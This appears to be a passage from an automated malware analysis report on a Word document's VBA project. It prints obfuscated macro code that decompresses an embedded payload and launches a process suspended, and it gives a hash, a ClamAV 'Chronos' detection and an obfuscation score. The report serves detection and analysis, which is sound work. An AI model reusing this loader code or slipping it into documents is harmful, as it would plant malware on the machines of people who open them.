Dim XhWjSwNKCJuk As TjtYWQXrM9, AeT5sFq9Orr As U6ECwjZSVYBjj1hf, KDKMaVNV As String
Dim CtOo94TTRc4 As Long, BWTLc As Long
CtOo94TTRc4 = 46
BWTLc = 12
If CtOo94TTRc4 + BWTLc > 4 Then
BWTLc = CtOo94TTRc4 + 16
Else
MsgBox 55
End If
AeT5sFq9Orr.U7KMQ = Len(AeT5sFq9Orr)
Dim Td3oP9kn9ZTA5 As Long, Oj02E9 As Long
Td3oP9kn9ZTA5 = 89
Oj02E9 = 58
If Td3oP9kn9ZTA5 + Oj02E9 > 4 Then
Oj02E9 = Td3oP9kn9ZTA5 + 78
Else
MsgBox 89
End If
CreateProcessA KDKMaVNV, HIDF16c53h1, ByVal 0&, ByVal 0&, 1&, &H20&, ByVal 0&, KDKMaVNV, AeT5sFq9Orr, XhWjSwNKCJuk
Dim CP1URNO As Long, MZAiM As Long
CP1URNO = 69
MZAiM = 19
If CP1URNO + MZAiM > 4 Then
MZAiM = CP1URNO + 69
Else
MsgBox 90
End If
CloseHandle XhWjSwNKCJuk.IY25Gycjz
Dim WxFLYBy02U As Long, B8sfivEjuTey9 As Long
WxFLYBy02U = 3
B8sfivEjuTey9 = 16
If WxFLYBy02U + B8sfivEjuTey9 > 4 Then
B8sfivEjuTey9 = WxFLYBy02U + 30
Else
MsgBox 62
End If
CloseHandle XhWjSwNKCJuk.LmOxABarcJL5m
Dim TF7M6cC As Long, SNJWwVfa As Long
TF7M6cC = 85
SNJWwVfa = 95
If TF7M6cC + SNJWwVfa > 4 Then
SNJWwVfa = TF7M6cC + 66
Else
MsgBox 53
End If
End Function
Private Sub DUYzbBVT92Ze(A0HyzK8MGUw() As Byte, Yh2AiyQX05ViPIu As Long)
Dim IUR0l998QJs As Long, OnmgRyLz5a As Long, Th992X2Ox As Byte, Du9p As Long, IQR1mfQcJM As Integer, Ob3MxMW0Cy0L As Byte, DARi1SFtnTQz() As Byte, QZfwN5Unh As Integer
Dim F6EVdbG68rvso7 As Long, RvGt5ODmG6 As Byte, OM4m9bkzb As Long, MfISmZSfaJe0xY As Long, YVKqELdZJeok As Long, CwR(0 To 7) As Byte, KzbFMQvWtvNY(0 To 511) As C03eX6D6jmcn, Oj9zBgQOKuc3GY(0 To 255) As Mm8EZ1xGjr
Du9p = 1
Ob3MxMW0Cy0L = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
XUcNdRhe2q 4, VarPtr(OM4m9bkzb), VarPtr(A0HyzK8MGUw(Du9p - 1))
Du9p = Du9p + 4
YVKqELdZJeok = OM4m9bkzb
If (OM4m9bkzb = 0) Then Exit Sub
ReDim DARi1SFtnTQz(0 To OM4m9bkzb - 1)
XUcNdRhe2q 2, VarPtr(IQR1mfQcJM), VarPtr(A0HyzK8MGUw(Du9p - 1))
Du9p = Du9p + 2
For IUR0l998QJs = 1 To IQR1mfQcJM
With Oj9zBgQOKuc3GY(A0HyzK8MGUw(Du9p - 1))
Du9p = Du9p + 1
.YpjK = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
ReDim .TRNy7MISLyyqY3el(0 To .YpjK - 1)
End With
Next
CwR(0) = 2 ^ 0
CwR(1) = 2 ^ 1
CwR(2) = 2 ^ 2
CwR(3) = 2 ^ 3
CwR(4) = 2 ^ 4
CwR(5) = 2 ^ 5
CwR(6) = 2 ^ 6
CwR(7) = 2 ^ 7
RvGt5ODmG6 = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
QZfwN5Unh = 0
For IUR0l998QJs = 0 To 255
With Oj9zBgQOKuc3GY(IUR0l998QJs)
If (.YpjK > 0) Then
For OnmgRyLz5a = 0 To (.YpjK - 1)
If (RvGt5ODmG6 And CwR(QZfwN5Unh)) Then .TRNy7MISLyyqY3el(OnmgRyLz5a) = 1
QZfwN5Unh = QZfwN5Unh + 1
If (QZfwN5Unh = 8) Then
RvGt5ODmG6 = A0HyzK8MGUw(Du9p - 1)
Du9p = Du9p + 1
QZfwN5Unh = 0
End If
Next
End If
End With
Next
If (QZfwN5Unh = 0) Then Du9p = Du9p - 1
MfISmZSfaJe0xY = 1
KzbFMQvWtvNY(0).W5AbpVdDDKhK = -1
KzbFMQvWtvNY(0).EIM = -1
KzbFMQvWtvNY(0).IkzFuKw4WZ = -1
KzbFMQvWtvNY(0).KEIMYcvA = -1
For IUR0l998QJs = 0 To 255
KCzBZWRiVFxy KzbFMQvWtvNY(), MfISmZSfaJe0xY, IUR0l998QJs, Oj9zBgQOKuc3GY(IUR0l998QJs)
Next
OM4m9bkzb = 0
For Du9p = Du9p To Yh2AiyQX05ViPIu
RvGt5ODmG6 = A0HyzK8MGUw(Du9p - 1)
For QZfwN5Unh = 0 To 7
If (RvGt5ODmG6 And CwR(QZfwN5Unh)) Then F6EVdbG68rvso7 = KzbFMQvWtvNY(F6EVdbG68rvso7).EIM Else F6EVdbG68rvso7 = KzbFMQvWtvNY(F6EVdbG68rvso7).W5AbpVdDDKhK
If (KzbFMQvWtvNY(F6EVdbG68rvso7).KEIMYcvA > -1) Then
DARi1SFtnTQz(OM4m9bkzb) = KzbFMQvWtvNY(F6EVdbG68rvso7).KEIMYcvA
OM4m9bkzb = OM4m9bkzb + 1
If (OM4m9bkzb = YVKqELdZJeok) Then GoTo YVKqELdZJeok
F6EVdbG68rvso7 = 0
End If
Next
Next
YVKqELdZJeok:
Th992X2Ox = 0
For IUR0l998QJs = 0 To (OM4m9bkzb - 1)
Th992X2Ox = Th992X2Ox Xor DARi1SFtnTQz(IUR0l998QJs)
Next
ReDim A0HyzK8MGUw(0 To OM4m9bkzb - 1)
XUcNdRhe2q OM4m9bkzb, VarPtr(A0HyzK8MGUw(0)), VarPtr(DARi1SFtnTQz(0))
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 52736 bytes
SHA-256: af3f2a596c73ec94fdf4b9b9efe40a8ccdeeac68911aeaaadabefbfd0e849dd2
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
334 of 592 identifiers look randomly generated (e.g. 'MsmOZAQyd3oyr5EbT8nbQ0f') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.